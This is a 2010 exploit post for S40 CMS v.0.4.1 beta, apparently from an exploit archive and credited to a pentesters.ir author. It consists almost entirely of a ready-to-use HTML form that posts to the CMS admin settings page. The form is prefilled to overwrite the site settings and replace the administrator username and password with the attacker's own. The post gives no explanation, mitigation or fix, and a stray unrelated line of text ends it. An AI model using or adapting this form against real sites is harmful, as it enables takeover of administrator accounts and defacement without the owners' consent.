In The Name Of GOD [+] Exploit Title:remote change user and password exploit [+] Date: 2010 [+] script:S40 CMS v.0.4.1 beta [+] Software: http://s40.biz/?p=download [+] Author: pentesters.ir [+]discovered by:ahmadbady [+] Contact : kivi_hacker666@yahoo.com [+] Website : WwW.PenTesters.IR expl: <h1>coded by ahmadbady</h1> <div id="inner"> <h1>http://pentesters.ir</h1> <form id="settings" name="settings" method="post" action="/S40CMS_041_beta/admin/main.php?a=settings" class="form"> <table width="100%" border="0" cellspacing="2" cellpadding="0"> <tr> <td colspan="2"><h2>Site settings</h2></td> </tr> <tr> <td width="70%" align="left" valign="top">The name of your site</td> <td width="30%" align="left" valign="top"></td> </tr> <tr> <td width="70%" align="left" valign="top"> <input name="title" type="text" class="validate[required] field" id="title" style="width:99%" value="root" /></td> <td width="30%" align="left" valign="top"></td> </tr> <tr> <td align="left" valign="top">Root URL address of your site (with end slash)</td> <td align="left" valign="top"> </td> </tr> <tr> <td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td> <td align="left" valign="top"> </td> </tr> <tr> <td colspan="2" align="left" valign="top">Your slogan</td> </tr> <tr> <td colspan="2" align="left" valign="top"><input name="slogan" type="text" class="validate[required] field" id="slogan" style="width:99%" value="roooot" /></td> </tr> <tr> <td colspan="2" align="left" valign="top">Keywords</td> </tr> <tr> <td colspan="2" align="left" valign="top"><input name="keywords" type="text" class="validate[required] field" id="keywords" style="width:99%" value="S40 CMS, content, management, system, cms" /></td> </tr> <tr> <td width="70%" align="left" valign="top">Description</td> <td width="30%" align="left" valign="top">Site theme</td> </tr> <tr> <td width="70%" rowspan="4" align="left" valign="top"><textarea name="description" id="description" rows="5" style="width:99%;" class="field">S40 CMS Free flat file Content Management System</textarea></td> <td width="30%" align="left" valign="top"> <select name="theme" id="theme"> <option value="default" selected="selected">default</option></select></td> </tr> <tr> <td width="30%" align="left" valign="top">Site language</td> </tr> <tr> <td width="30%" align="left" valign="top"><select name="lang" id="lang"> <option value="en" selected="selected">en</option></select></td> </tr> <tr> <td width="30%" align="left" valign="top">Language direction</td> </tr> <tr> <td width="70%" align="left" valign="top"><h2>User settings</h2></td> <td align="left" valign="top"><select name="langdir" id="langdir"> <option value="ltr" selected="selected">ltr</option><option value="rtl">rtl</option></select></td> </tr> <tr> <td align="left" valign="top">Your name</td> <td align="left" valign="top">Sidecol position</td> </tr> <tr> <td align="left" valign="top"><input name="name" type="text" class="validate[required] field" id="name" style="width:99%" value="ahmadbady" /></td> <td align="left" valign="top"><select name="sidecol" id="sidecol"> <option value="right" selected="selected">Right</option><option value="left">Left</option></select></td> </tr> <tr> <td align="left" valign="top">Username-----At least 6 characters</td></td> <td align="left" valign="top">Display headerbar</td> </tr> <tr> <td align="left" valign="top"><input name="user" type="text" class="validate[required,length[6,24]] field" id="user" style="width:99%" value="ahmadbady" /></td> <td align="left" valign="top"><select name="headerbar" id="headerbar"> <option value="true" selected="selected">Display</option><option value="false">Hide</option></select></td> </tr> <tr> <td align="left" valign="top">Password-----just 6 characters</td></td> <td align="left" valign="top"> </td> </tr> <tr> <td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td> <td align="left" valign="top"> </td> </tr> <tr> <td align="left" valign="top">Password again-----just 6 characters</td></td> <td align="left" valign="top"> </td> </tr> <tr> <td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td> <td align="left" valign="top"> </td> </tr> <tr> <td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" /> <input name="submit" type="hidden" id="submit" value="true" /> <input name="actions" type="hidden" id="actions" value="settings" /></td> </tr> <tr> <td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td> </tr> <tr> <td colspan="2" align="center" valign="top"> </td> </tr> </table> </form> </div> </div> <div id="end" class="roundbtm"></div> </div> <div id="footer"> </div> </body> </html>
体验盒子
